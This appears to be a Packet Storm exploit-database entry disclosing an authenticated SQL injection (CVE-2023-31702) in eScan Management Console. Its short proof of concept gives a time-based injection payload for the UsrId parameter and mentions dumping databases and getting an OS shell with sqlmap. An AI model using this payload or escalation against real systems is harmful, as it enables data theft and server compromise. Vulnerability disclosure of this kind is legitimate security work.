Lucene search

K
packetstormSahil OjhaPACKETSTORM:172545
HistoryMay 24, 2023 - 12:00 a.m.

eScan Management Console 14.0.1400.2281 SQL Injection

2023-05-2400:00:00
Sahil Ojha
packetstormsecurity.com
141
escan management console
sql injection
authenticated
vendor
software link
windows
cve-2023-31702
proof of concept
payload
sqlmap

0.005 Low

EPSS

Percentile

75.6%

`# Exploit Title: eScan Management Console 14.0.1400.2281 - SQL Injection (Authenticated)  
# Date: 16/05/2023  
# Exploit Author: Sahil Ojha  
# Vendor Homepage: https://www.escanav.com  
# Software Link: https://cl.escanav.com/ewconsole.dll  
# Version: 14.0.1400.2281  
# Tested on: Windows  
# CVE : CVE-2023-31702  
  
*Step of Reproduction/Proof of concept(POC)*  
  
1. Login into the escan management console with a valid username and  
password as root user.  
2. Navigate to URL:  
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1&cnt=4176  
3. Inject the payload into the UsrId parameter to confirm the SQL  
injection as shown below:  
https://cl.escanav.com/ewconsole/ewconsole.dll/GetUserCurrentPwd?UsrId=1;WAITFOR  
DELAY '0:0:5'--&cnt=4176  
4. The time delay of 5 seconds confirmed that "UsrId" parameter was  
vulnerable to SQL Injection. Furthermore, it was also possible to dump  
all the databases and inject OS shell directly into the MS SQL Server  
using SQLMap tool.  
  
`

0.005 Low

EPSS

Percentile

75.6%

Related for PACKETSTORM:172545